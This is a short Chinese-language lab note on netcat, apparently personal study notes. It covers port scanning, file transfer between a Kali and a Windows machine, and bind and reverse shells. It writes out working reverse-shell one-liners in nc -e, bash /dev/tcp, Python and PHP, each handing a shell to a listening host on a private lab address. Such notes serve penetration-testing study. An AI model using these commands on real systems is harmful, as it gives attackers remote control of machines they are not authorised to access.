nc 192.168.227.128 -znv 80

-z 零输入输出模式（用于端口扫描）

-n 只允许数字地址

-v|vv 详细信息|超详细信息

服务端

nc -lvvp 4444 > 1.txt

-l  监听

-vv 超详细信息

-p  port端口

-q 1 #按键ctrl+d 发送EOF 立即断开

客户端

C:\Users\ZJW\Desktop\netcat\nc64.exe 192.168.227.129 4444 < 33.txt

（这边的前面是调用nc64.exe）

<当指向port 就想将文件进行传输过去    >就是将文件保存到xx位置

这里我把端口当成一个存取站点，服务端就是站长，客户端所带ip就是站点地址，客户端把33.txt文件存到了4444端口然后服务端把这个文件的内容放到1.txt里面。

反之就是服务端把东西放在站点，客户端来到站点取东西。

（东西放在哪就要到哪里去取）

nc -lvvp 7777 -e /bin/bash                    目标机kali    服务端

nc64.exe 192.168.227.129 7777                操作机win7  客户端

这里需要目标机的ip地址

nc 192.168.227.128 7777 -e /bin/bash        目标机kali   客户端

nc64.exe -lvvp 7777                       操作机win7  服务端

这里操作机就不用目标机的ip地址

bash -i >& /dev/tcp/192.168.227.129/4444 0>&1

-i 打开一个交互的bash

>&  将标准错误输出重定向到标准输出

0>&1  将标准输入转化为标准输出

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.227.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("192.168.227.129",4444);exec("/bin/sh -i <&3 >&3 2>&3");'